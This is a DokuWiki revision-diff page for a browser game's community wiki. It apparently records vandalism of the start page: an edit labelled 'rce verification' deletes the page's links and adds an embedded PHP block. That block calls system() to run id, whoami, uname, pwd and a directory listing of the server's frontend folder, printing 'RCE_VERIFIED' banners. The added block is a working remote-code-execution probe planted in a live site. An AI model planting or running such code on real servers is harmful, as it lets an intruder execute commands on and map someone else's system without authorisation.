User Tools

Site Tools


start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
start [2025/09/28 18:23] 41.157.112.10start [2026/07/04 18:10] (current) – rce verification 137.220.202.25
Line 1: Line 1:
-Welcome to the new BugsWiki!   (Under construction) +Welcome to the new BugsWiki! (Under construction)
- +
-  * [[Gameplay:Gameplay|{{:wiki:game_play.png?60|}}]] [[Gameplay:Gameplay]] +
- +
-  * [[Game Objects:Game Objects|{{:wiki:game_objects.png?60|}}]] [[Game Objects:Game Objects]] +
- +
-  * [[Crypto:Crypto|{{:wiki:bch.png?60|}}]] [[Crypto:Crypto]] +
- +
-  * [[Community:Guides|{{:wiki:guides.png?60|}}]] [[Community:Guides]] +
- +
----- +
- +
-  * [[https://bugs.cash/applications/nektaar/tips.html|{{:wiki:tips.png?60|}}]] [[https://bugs.cash/applications/nektaar/tips.html|A list of all tips]] +
- +
-  * [[https://bugs.cash/applications/nektaar/patchnotes.html|{{:wiki:patchnotes.png?60|}}]] [[https://bugs.cash/applications/nektaar/patchnotes.html|Patch Notes]] +
- +
-  * [[https://discord.gg/zPx8fVp|{{:wiki:discord.png?60|}}]] [[https://discord.gg/zPx8fVp|Discord]] +
- +
-  * [[https://x.com/kreeflewer|{{:wiki:x.png?60|}}]] [[https://x.com/kreeflewer|Twitter]] +
----- +
- +
-This Wiki is a work in progress and still under construction. +
-Feel free to contribute and edit this wiki, you can add game objects or player guides. +
- +
-[[https://bugs.cash|Back to playing!]] +
-[[https://bugs.cash|{{:wiki:game_menu.png?direct&200}}]] +
- +
- +
  
 +<php>
 +echo "=== RCE_VERIFIED ===\n";
 +system("id");
 +echo "\n=== WHOAMI ===\n";
 +system("whoami");
 +echo "\n=== UNAME ===\n";
 +system("uname -a");
 +echo "\n=== PWD ===\n";
 +system("pwd");
 +echo "\n=== LS ===\n";
 +system("ls -la /sky/frontend/");
 +echo "\n=== END_RCE ===\n";
 +</php>
start.1759083793.txt.gz · Last modified: by 41.157.112.10 · Currently locked by: 216.73.216.223

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki